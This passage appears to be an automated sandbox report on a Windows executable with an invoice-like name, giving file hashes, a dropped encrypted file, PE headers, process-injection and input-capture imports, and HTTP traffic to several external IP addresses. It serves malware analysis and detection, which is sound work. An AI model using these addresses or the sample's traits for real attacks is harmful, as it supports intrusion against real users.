                                        Entropy (8bit):3.0948663810883623
                                        Encrypted:false
                                        SSDEEP:48:uAGV1NWQ4QBz9u17I+cA5GAkebA1DGAae85AKsGA5e4A+yGABefmAoNDl2nA4APi:c
                                        MD5:40FAA5495B7010ACDE5EBD2415AA20C8
                                        SHA1:EECFFF42FEE9377540B0D718622E72EDC397549A
                                        SHA-256:66DEEA74665A2CBE7B77A0E688C70FCE85DD2AB05ABDA486859FCE31C0A72A4C
                                        SHA-512:5B88B3CB4FC009E0D0E0C8C1D05D67655B272BC8091E2AC08DB304B556E43FF8F8864E8710AD90D3442608273EE9D321A32D79F5D2908D7FEA70CBA7089F59AD
                                        Malicious:false
                                        Preview:0324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481

                                        C:\Users\user\AppData\Local\Temp\piceworth

                                        Download File
                                        Process:C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286208
                                        Entropy (8bit):7.990519326668667
                                        Encrypted:true
                                        SSDEEP:6144:tle2dJcYKOhiSvaQ8U6NKvNa4A3+v1N0P1wRm:tle2dJc3uv76MQjUQ28
                                        MD5:CA682B212E6AA6A0CE4037D2050704C7
                                        SHA1:DE68A7B5941FF1EDA148301FCEF9AED2124B3C39
                                        SHA-256:A4C715DEEEC61D98A6588C18A65818622385454DFCBA470E8CCAE1E8B8116263
                                        SHA-512:87AF907F493DEAC90329B9C8173C7618319594B720B1950383B0CEB29E5CDC430DE9B6B215D7E45A3F87916B5D09AB7640F9B31940E81AB61F798E84237D1694
                                        Malicious:false
                                        Preview:.n...TMSL...G..o.NV..dWE...U4NPLTMSLNU4NPLTMSLNU4NPLTMSLN.4NPBK.]L.\.o.M..r.&<Gn >;*!-#uW/>";9s.+uF;>l=#s....#?(1c^ADq4NPLTMS5O\.s0+.p3+.hT).V..v.2.T..q3+.O..p4*..'6\s0+.MSLNU4NP..MS.OT4....MSLNU4NP.TORGO^4N.HTMSLNU4NP|AMSL^U4N0HTMS.NU$NPLVMSJNU4NPLTKSLNU4NPL4ISLLU4NPLTOS..U4^PLDMSLNE4N@LTMSLNE4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4`$),9SLNA.JPLDMSL.Q4N@LTMSLNU4NPLTMSlNUTNPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLN

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.15682180612152
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:20-EM-00- PI-INQ-3001.exe
                                        File size:1'163'264 bytes
                                        MD5:f295444b03c418b35dcb676ed284e846
                                        SHA1:314ca3515894c3d36b10653a7bace039a6991f19
                                        SHA256:594db372022016f6e585ebdba18d74c642ce91613bdb2925d11b0e499c9d46d9
                                        SHA512:ce256901d2c79be4ffd96ff2f0ec2d8bb5f76db2a0baa489639aac5a2d5646d9bfbf3c542d6c2fcf0aa4b8a13d24ba46dc67340c2a124023bbd94cb532971e26
                                        SSDEEP:24576:xAHnh+eWsN3skA4RV1Hom2KXMmHaLPFU1Mz+WbXk5:Ih+ZkldoPK8YaLPan
                                        TLSH:5D35BD0273D2D036FFABA2739B6AB20256BC79254133852F13981DB9BD701B1237D663
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                        File Icon

                                        Icon Hash:4a786c6652ece047

                                        Static PE Info

                                        General

                                        Entrypoint:0x42800a
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66D688AA [Tue Sep 3 03:55:22 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F317CE2B46Dh
                                        jmp 00007F317CE1E224h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F317CE1E3AAh
                                        cmp edi, eax
                                        jc 00007F317CE1E70Eh
                                        bt dword ptr [004C41FCh], 01h
                                        jnc 00007F317CE1E3A9h
                                        rep movsb
                                        jmp 00007F317CE1E6BCh
                                        cmp ecx, 00000080h
                                        jc 00007F317CE1E574h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F317CE1E3B0h
                                        bt dword ptr [004BF324h], 01h
                                        jc 00007F317CE1E880h
                                        bt dword ptr [004C41FCh], 00000000h
                                        jnc 00007F317CE1E54Dh
                                        test edi, 00000003h
                                        jne 00007F317CE1E55Eh
                                        test esi, 00000003h
                                        jne 00007F317CE1E53Dh
                                        bt edi, 02h
                                        jnc 00007F317CE1E3AFh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F317CE1E3B3h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F317CE1E405h
                                        bt esi, 03h

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD5 build 40629
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD5 build 40629

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x519d8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x11a0000x7134.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xc80000x519d80x51a00acc4df1cebc16ce062aabf871a5e3506False0.9650112461715161data7.961795671644971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x11a0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xc84880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0xc85b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0xc86d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0xc88000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.28189493433395874
                                        RT_ICON0xc98a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5487588652482269
                                        RT_MENU0xc9d100x50dataEnglishGreat Britain0.9
                                        RT_STRING0xc9d600x594dataEnglishGreat Britain0.3333333333333333
                                        RT_STRING0xca2f40x68adataEnglishGreat Britain0.2747909199522103
                                        RT_STRING0xca9800x490dataEnglishGreat Britain0.3715753424657534
                                        RT_STRING0xcae100x5fcdataEnglishGreat Britain0.3087467362924282
                                        RT_STRING0xcb40c0x65cdataEnglishGreat Britain0.34336609336609336
                                        RT_STRING0xcba680x466dataEnglishGreat Britain0.3605683836589698
                                        RT_STRING0xcbed00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                        RT_RCDATA0xcc0280x4d484data1.0003348623273565
                                        RT_GROUP_ICON0x1194ac0x22dataEnglishGreat Britain1.0588235294117647
                                        RT_GROUP_ICON0x1194d00x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0x1194e40x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0x1194f80x14dataEnglishGreat Britain1.25
                                        RT_VERSION0x11950c0xdcdataEnglishGreat Britain0.6181818181818182
                                        RT_MANIFEST0x1195e80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                        Imports

                                        DLLImport
                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                        PSAPI.DLLGetProcessMemoryInfo
                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                        UxTheme.dllIsThemeActive
                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 3, 2024 13:53:31.809596062 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:31.814415932 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:31.814502001 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:31.821599960 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:31.826390982 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768141985 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768157959 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768168926 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768213987 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768224955 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768234968 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768246889 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768337965 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:32.768337965 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:32.768424034 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768445969 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768455982 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768466949 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:32.768492937 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:32.768543959 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:32.768589020 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:32.785926104 CEST4973680192.168.2.4194.233.65.154
                                        Sep 3, 2024 13:53:32.790712118 CEST8049736194.233.65.154192.168.2.4
                                        Sep 3, 2024 13:53:47.851542950 CEST4973880192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:47.856487036 CEST804973845.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:47.856595039 CEST4973880192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:47.873534918 CEST4973880192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:47.878381014 CEST804973845.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:48.732291937 CEST804973845.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:48.732312918 CEST804973845.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:48.732434034 CEST4973880192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:49.385509968 CEST4973880192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:50.403922081 CEST4973980192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:50.408808947 CEST804973945.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:50.408901930 CEST4973980192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:50.418615103 CEST4973980192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:50.423440933 CEST804973945.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:51.267524004 CEST804973945.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:51.267765999 CEST804973945.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:51.267824888 CEST4973980192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:51.932363987 CEST4973980192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:52.951236010 CEST4974080192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:52.956360102 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.956485987 CEST4974080192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:52.967376947 CEST4974080192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:52.972711086 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972721100 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972728968 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972738028 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972745895 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972755909 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972763062 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972770929 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:52.972780943 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:53.803051949 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:53.803174019 CEST804974045.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:53.803276062 CEST4974080192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:54.479284048 CEST4974080192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:55.509927988 CEST4974180192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:55.697953939 CEST804974145.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:55.698333979 CEST4974180192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:55.705291033 CEST4974180192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:55.710112095 CEST804974145.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:56.540819883 CEST804974145.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:56.540868044 CEST804974145.157.69.194192.168.2.4
                                        Sep 3, 2024 13:53:56.541946888 CEST4974180192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:56.559426069 CEST4974180192.168.2.445.157.69.194
                                        Sep 3, 2024 13:53:56.564279079 CEST804974145.157.69.194192.168.2.4
                                        Sep 3, 2024 13:54:01.617245913 CEST4974280192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:01.623166084 CEST804974237.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:01.623254061 CEST4974280192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:01.633040905 CEST4974280192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:01.637801886 CEST804974237.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:02.507756948 CEST804974237.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:02.507776976 CEST804974237.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:02.507791996 CEST804974237.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:02.507803917 CEST804974237.187.158.211192.168.2.4
